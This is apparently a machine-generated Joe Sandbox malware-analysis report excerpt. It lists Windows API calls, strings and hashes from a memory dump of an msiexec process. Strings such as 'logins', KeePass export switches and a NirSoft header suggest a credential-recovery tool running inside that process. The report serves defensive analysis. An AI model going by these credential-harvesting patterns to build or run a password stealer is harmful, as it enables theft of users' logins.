                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                    • String ID: logins$null
                                                                                                    • API String ID: 2148543256-2163367763
                                                                                                    • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                    • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
• memset.MSVCRT ref: 00408606
• strcmp.MSVCRT ref: 00408645
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
• memset.MSVCRT ref: 0040870E
• strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
• CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3437578500-2854292027
• Opcode ID: dd6493097ef40e1efd4af62dec432b5c039981901f0df510f1d3cf0aab96b3cc
• Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
• Opcode Fuzzy Hash: dd6493097ef40e1efd4af62dec432b5c039981901f0df510f1d3cf0aab96b3cc
• Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
APIs
• memset.MSVCRT ref: 0041087D
• memset.MSVCRT ref: 00410892
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
• SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
• SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
• GetModuleHandleW.KERNEL32(00000000), ref: 00410951
• LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
• GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
• LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
• GetSysColor.USER32(0000000F), ref: 00410999
• DeleteObject.GDI32(?), ref: 004109D0
• DeleteObject.GDI32(?), ref: 004109D6
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
Similarity
• API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
• API String ID: 1010922700-0
• Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
• Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
• Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
• Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• free.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• free.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• free.MSVCRT ref: 00418716
• free.MSVCRT ref: 0041872A
• free.MSVCRT ref: 00418749
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID: |A
• API String ID: 3356672799-1717621600
• Opcode ID: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
• Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
• Opcode Fuzzy Hash: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
• Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
• Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
• Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
• Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
• Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2012295524-70141382
• Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
• Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
• Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
• Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
• Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
APIs
• GetDC.USER32(00000000), ref: 004121FF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
• ReleaseDC.USER32(00000000,00000000), ref: 0041221F
• SetBkMode.GDI32(?,00000001), ref: 00412232
• SetTextColor.GDI32(?,00FF0000), ref: 00412240
• SelectObject.GDI32(?,?), ref: 00412251
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
• SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
• GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
• LoadCursorW.USER32(00000000,00000067), ref: 004122B5
• SetCursor.USER32(00000000), ref: 004122BC
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT(?,?,00002008), ref: 0041234D
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• API String ID: 1700100422-0
• Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
• Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
• Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
• Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 552707033-0
                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14

Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
• Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
• Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
• Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
• Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9

APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
• Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
• Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58

APIs
• LoadMenuW.USER32(?,?), ref: 0040D97F
  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
• DestroyMenu.USER32(00000000), ref: 0040D99D
• CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
• GetDesktopWindow.USER32 ref: 0040D9FD
• CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
• memset.MSVCRT ref: 0040DA23
• GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
• EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
• DestroyWindow.USER32(00000005), ref: 0040DA70
  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
Similarity
• API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
• String ID: caption
• API String ID: 973020956-4135340389
• Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
• Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
• Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
• Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59

Strings
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
• <table dir="rtl"><tr><td>, xrefs: 00410B00
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 1283228442-2366825230
• Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
• Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
• Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
• Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9

APIs
• wcschr.MSVCRT ref: 00413972
• wcscpy.MSVCRT ref: 00413982
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
• wcscpy.MSVCRT ref: 004139D1
• wcscat.MSVCRT ref: 004139DC
• memset.MSVCRT ref: 004139B8
  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
• memset.MSVCRT ref: 00413A00
• memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
• wcscat.MSVCRT ref: 00413A27
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763
• Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
• Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
• Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
• Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E

Similarity
• API ID: wcscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 1284135714-318151290
• Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
• Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
• Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
• Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F

APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Similarity
• API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4019544885-1856150674
• Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
• Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
• Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
• Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                    • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                    • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 290601579-0
                                                                                                    • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                    • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                    APIs
                                                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                    • memset.MSVCRT ref: 0044505E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                    • String ID: PD$PD
                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                    • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                    • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2163313125-0
                                                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                    • Opcode ID: 0a21022ade25364a459c01dbdfae5a7e449708d8ae9a55635109c9c8637ae203
                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                    • Opcode Fuzzy Hash: 0a21022ade25364a459c01dbdfae5a7e449708d8ae9a55635109c9c8637ae203
                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
